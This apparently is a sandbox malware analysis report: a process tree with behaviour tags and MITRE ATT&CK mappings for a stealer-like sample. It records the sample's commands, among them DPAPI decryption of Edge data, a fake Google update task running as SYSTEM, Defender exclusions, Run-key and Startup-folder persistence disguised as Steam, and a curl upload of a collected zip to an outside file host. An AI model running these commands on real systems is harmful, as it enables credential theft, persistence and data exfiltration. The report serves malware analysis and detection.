        command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4112
  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      - Suspicious use of WriteProcessMemory
      PID: 4812

    [3] C:\Windows\System32\Wbem\WMIC.exe
        command: wmic diskdrive get serialnumber
        - Suspicious use of AdjustPrivilegeToken
        PID: 68

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      - Suspicious use of WriteProcessMemory
      PID: 4868

    [3] C:\Windows\system32\reg.exe
        command: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
        PID: 1976

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      - Suspicious use of WriteProcessMemory
      PID: 4908

    [3] C:\Windows\system32\schtasks.exe
        command: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        - Scheduled Task/Job: Scheduled Task
        PID: 3824
  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      - Hide Artifacts: Hidden Window
      - Suspicious use of WriteProcessMemory
      PID: 1412

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        PID: 1620

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.cmdline"
          PID: 720

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99A0.tmp" "c:\Users\Admin\AppData\Local\Temp\fztpdle2\CSCED27ED56003450AB6A0C9D81CFCD6D3.TMP"
            PID: 1408
  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      - Suspicious use of WriteProcessMemory
      PID: 4100

    [3] C:\Windows\System32\Wbem\WMIC.exe
        command: wmic bios get smbiosbiosversion
        - Suspicious use of AdjustPrivilegeToken
        PID: 2816

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
      - Suspicious use of WriteProcessMemory
      PID: 516

    [3] C:\Windows\system32\cscript.exe
        command: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
        - Checks computer location settings
        PID: 4180

      [4] C:\Windows\system32\cmd.exe
          command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
          PID: 1628

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 5028

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 2328

        [5] C:\Windows\system32\reg.exe
            command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Setup.exe" /f
            - Adds Run key to start application
            - Modifies registry key
            PID: 8

        [5] C:\Windows\system32\reg.exe
            command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
            - Modifies registry key
            PID: 3096

        [5] C:\Windows\system32\curl.exe
            command: curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
            PID: 4552
[level 2] C:\Windows\system32\cmd.exe  PID:4504
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  - Suspicious use of WriteProcessMemory

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2348
  wmic baseboard get serialnumber

[level 2] C:\Windows\system32\cmd.exe  PID:4900
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  - Suspicious use of WriteProcessMemory

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3808
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4148
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:4884
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:456
  wmic path win32_computersystemproduct get uuid

[level 2] C:\Windows\system32\cmd.exe  PID:3292
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2564
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:2892
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3928
  wmic PATH Win32_VideoController GET Description,PNPDeviceID

[level 2] C:\Windows\system32\cmd.exe  PID:5016
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4312
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:4468
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2576
  wmic memorychip get serialnumber

[level 2] C:\Windows\system32\cmd.exe  PID:4756
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:100
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:2708
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3888
  wmic csproduct get uuid

[level 2] C:\Windows\system32\cmd.exe  PID:3684
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:68
  wmic cpu get processorid

[level 2] C:\Windows\system32\cmd.exe  PID:4100
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4144
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:1660
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

[level 3] C:\Windows\system32\getmac.exe  PID:3772
  getmac /NH

[level 2] C:\Windows\system32\cmd.exe  PID:1252
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1056
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:3304
  find /i "Speed"
[level 2] C:\Windows\system32\cmd.exe  PID:4352
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4736
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:3984
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:1520
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:1400
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:3576
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:3952
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4312
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:3732
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:880
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4080
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:1448
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3568
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:4492
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:2716
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:2772
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:872
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:1940
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4872
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:4812
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:796
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:684
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:4272
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3608
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:4144
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4900
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses
[level 2] C:\Windows\system32\cmd.exe  PID:1116
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:1740
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:3664
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4124
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:4004
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2192
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:2544
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:2564
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:624
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:540
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4848
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:2628
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4796
  powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:3824
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";"

[level 3] C:\Windows\system32\curl.exe  PID:1908
  curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";

[level 2] C:\Windows\system32\cmd.exe  PID:232
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:4812
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:1044
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1452
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:2408
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2384
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4064
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:5008
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2028
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:2312
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:2500
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses
[level 2] C:\Windows\system32\cmd.exe  PID:4144
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:4888
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:1716
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4124
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:652
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2544
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:2792
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:4808
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:624
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:3676
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4312
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:668
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:2496
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:4048
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1260
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:924
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2328
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4872
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:540
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1068
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:4120
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:1844
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:1044
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:1072
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:1608
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

[level 2] C:\Windows\system32\cmd.exe  PID:404
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4600
  wmic bios get smbiosbiosversion
[level 2] C:\Windows\system32\cmd.exe  PID:4744
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3720
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4352
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:892
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1268
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:3292
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3928
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:4928
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:1520
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:1956
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3824
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:1552
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2892
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4716
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:4660
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1512
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:3676
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:872
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:4848
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:4872
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:232
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4480
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:2716
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3900
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:1720
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:996
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2708
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:4492
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:5080
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:4128
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:1952
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:5108
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1348
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:2104
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:2288
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:1116
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:3576
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:1624
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:1180
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3520
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 2] C:\Windows\system32\cmd.exe  PID:1908
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

[level 3] C:\Windows\system32\curl.exe  PID:4528
  curl http://api.ipify.org/ --ssl-no-revoke

[level 2] C:\Windows\system32\cmd.exe  PID:4716
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:4296
  wmic bios get smbiosbiosversion

[level 2] C:\Windows\system32\cmd.exe  PID:844
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:636
  wmic MemoryChip get /format:list

[level 3] C:\Windows\system32\find.exe  PID:4660
  find /i "Speed"

[level 2] C:\Windows\system32\cmd.exe  PID:4004
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

[level 3] C:\Windows\System32\Wbem\WMIC.exe  PID:3548
  wmic path win32_VideoController get name
  - Detects videocard installed

[level 2] C:\Windows\system32\cmd.exe  PID:1804
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:2772
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
  - Suspicious behavior: EnumeratesProcesses

[level 1] C:\Windows\System32\rundll32.exe  PID:4928
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[level 1] C:\Windows\system32\SearchIndexer.exe  PID:8
  C:\Windows\system32\SearchIndexer.exe /Embedding

[level 2] C:\Windows\system32\SearchProtocolHost.exe  PID:1512
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  - Modifies data under HKEY_USERS

[level 2] C:\Windows\system32\SearchFilterHost.exe  PID:684
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
